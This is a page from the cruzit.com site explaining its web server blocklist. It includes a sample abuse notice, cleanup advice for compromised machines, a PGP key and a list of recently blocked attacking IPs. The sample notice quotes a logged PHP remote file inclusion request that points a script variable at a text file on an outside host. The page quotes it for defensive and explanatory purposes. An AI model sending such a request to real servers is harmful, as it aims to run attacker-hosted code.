CruzIT
Saturday September 07, 2024 - 3:06:35 AM

Registered Linux User #440901    


 
Login    Register
Login Required

Web Server Blocklist and Blacklist Information

Web server Blocklist

Responsible persons listed in DNS get an email when a compromised machine attacks or attempts to abuse one of our servers. This is similar to what they will see:

Below is the IP address and type of attack recently observed
and blocked on one of our web servers. The individual IP address is listed
on the internet as a recommended deny for web servers or firewalls until we
hear back from you that the machine in question has been fixed.
Some ISP, NOC, web archive copies or lists that refer to this list may  
take two or more business days to reflect the removal of IP addresses.
time of request: Wednesday September 21, 2011 - 05:43:47 AM PDT
ip: 91.121.14.107
remote host: ns23561.ovh.net
user-agent string: Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser
1.1; rev1.1; Windows NT 5.1;)
requested url:
////?_SERVER[DOCUMENT_ROOT]=http://www.miniprice.pl/osco/grace.txt??
referer: 
source port: 43925
destination port: 80

This message is generated only when attacks occur and is sent to the
responsible parties listed in the DNS of the attacking IP address.
Please see http://www.cruzit.com/botblock.php for more information
on the fields in this message and what to do about it.

If you or your customer received this kind of message, the first thing you should do, of course, is take the machine off-line listed after “ip:”. A large percentage of machines that are blocked are compromised with some sort of XSS issue. (Cross Site Scripting) Someone has injected code in your web pages so that when someone visits your page, data will get pulled from another machine and be presented (usually hidden) to that person's browser. One thing to look for is code in your web pages like <iframe> and/or <javascript> tags that you didn't put there. Also check your web server and traffic logs for traffic requests going to or coming from the machine listed in the “requested url:” section of the report we sent to you. In the above example you would be looking for traffic to or from “http://www.miniprice.pl/”. The referer is quite often blank.
Note:
IP Addresses that have been blocked and reported are also listed on the public blacklists.
One of which is HERE.
ISP, DNS, Mail Server and Site Owner personel use these lists for blocking and/or rejecting similar attacks on their systems using rbl style or firewall rules such as as PeerBlock, PeerGuardian linux, iplist, Vuze, Transmission, uTorrent and, pfBlocker. They may not accept any traffic from the blocked IP address.

If this tool helped you or your customer, please consider donating to the cause. Click the donation button below to make a donation. Any donation is helpful, as this site is supported entirely by donations.

Help Keep Us Online  

All information on this web site is free. Most tools and some information requires signing in. The only reason for this is to prevent abuse by bots and other nefarious agents that attempt baning our tools. Please see our easy to read Privacy Policy for more information.
Yes, baning is a real word. (From approximately 1578) Just seeing if you were paying attention.

Mail coming from us should have a pgp signature similar to:

-----BEGIN PGP PUBLIC KEY BLOCK-----

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
=v3En
-----END PGP PUBLIC KEY BLOCK-----

@ Active Member Project Honeypot  email addresses

This page was last modified on 11/19/23 @ 04:32:55:pm
This file name: botblock.php

Questions, Comments, Suggestions or Requests should be sent to:  ronnie@cruzit.com 

There have been  17600  Unique Visitors (IP Addresses) to this site.

Current users online : 21
Maximum users at a time : 60
Last 25 attacks have come from:
45.63.83.161
66.70.181.5
45.77.6.159
103.153.214.173
15.237.180.153
147.78.47.62
51.222.44.176
51.15.184.67
45.32.92.198
13.233.249.140
149.28.250.196
107.189.11.116
85.190.242.220
145.239.10.137
91.239.208.148
62.169.29.121
45.63.90.95
68.178.166.166
45.76.18.208
155.138.243.173
36.255.3.63
13.39.19.34
159.65.227.65
35.180.242.121
13.38.55.190

There are currently 25 unique IP addresses blacklisted.

Public cruzit.com Server Status
server online dbc001  db cluster service
 Is On-Line
server offline www03  web service
 Aw Crap!, It's Off-Line
server online www  web service
 Is On-Line
server offline mx 08  mail service
 Aw Crap!, It's Off-Line
server offline www ha  F/O web service
 Aw Crap!, It's Off-Line
server offline mx 11  mail service
 Aw Crap!, It's Off-Line
server online Primary  Client DNS
 Is On-Line
server online Secondary  Client DNS
 Is On-Line

©Copyright 2004-2024 - cruzit.com - Redd Enterprises™, Inc.,  All Rights Reserved.
Ubuntu® is a registered trademark of Canonical Ltd.
Linux® is a registered trademark of Linus Torvalds.
Apache® is a registered trademark of The Apache Software Foundation.
PHP® is a registered trademark of The PHP Group.
The MariaDB® a registered trademark of the MariaDB Corporation Ab.
MySQL® is a registered trademark of the Oracle Corporation Inc.
All other product and service names mentioned are the trademarks of their respective companies.

 

pretrial
pretrial
pretrial
pretrial
Let us know what you think! finance@homelandcomputersecurity.com